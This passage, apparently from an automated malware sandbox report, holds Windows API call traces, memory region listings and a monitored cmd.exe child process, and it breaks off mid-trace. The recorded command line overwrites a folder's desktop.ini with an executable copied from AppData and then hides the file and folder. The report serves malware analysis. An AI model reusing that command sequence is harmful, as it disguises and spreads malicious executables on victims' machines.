dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.477] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.478] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.478] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.479] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.479] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.480] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.480] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.481] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.481] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x32, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x32, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.481] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.481] _close (_FileHandle=4) returned 0 [0136.482] FindNextFileW (in: hFindFile=0xa0ea0, lpFindFileData=0x2ef2e4 | out: lpFindFileData=0x2ef2e4) returned 0 [0136.482] GetLastError () returned 0x12 [0136.482] FindClose (in: hFindFile=0xa0ea0 | out: hFindFile=0xa0ea0) returned 1 [0136.482] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0136.483] _close (_FileHandle=3) returned 0 [0136.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.484] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.488] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.488] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.488] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.488] SetConsoleInputExeNameW () returned 0x1 [0136.488] GetConsoleOutputCP () returned 0x1b5 [0136.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.489] exit (_Code=0) Process: id = "143" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13781 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13782 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13783 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13784 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13785 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13786 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13787 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13788 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13789 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13790 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14045 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14046 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14047 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14048 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14049 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 14050 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14051 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14052 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14053 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14054 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14055 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14056 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14057 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14058 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14127 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 14128 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14129 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14130 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14131 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14132 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14133 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 14134 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 14135 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 14136 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 14218 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 200 os_tid = 0xcac [0136.301] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afb2c | out: lpSystemTimeAsFileTime=0x2afb2c*(dwLowDateTime=0x8b2c83a0, dwHighDateTime=0x1d440a9)) [0136.301] GetCurrentProcessId () returned 0xcb0 [0136.301] GetCurrentThreadId () returned 0xcac [0136.301] GetTickCount () returned 0x2b154 [0136.301] QueryPerformanceCounter (in: lpPerformanceCount=0x2afb24 | out: lpPerformanceCount=0x2afb24*=19309034599) returned 1 [0136.302] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.302] __set_app_type (_Type=0x1) [0136.302] __p__fmode () returned 0x76b331f4 [0136.302] __p__commode () returned 0x76b331fc [0136.302] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.302] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.302] GetCurrentThreadId () returned 0xcac [0136.302] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcac) returned 0x38 [0136.302] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.303] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.303] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afabc | out: phkResult=0x2afabc*=0x0) returned 0x2 [0136.324] VirtualQuery (in: lpAddress=0x2afaf3, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, 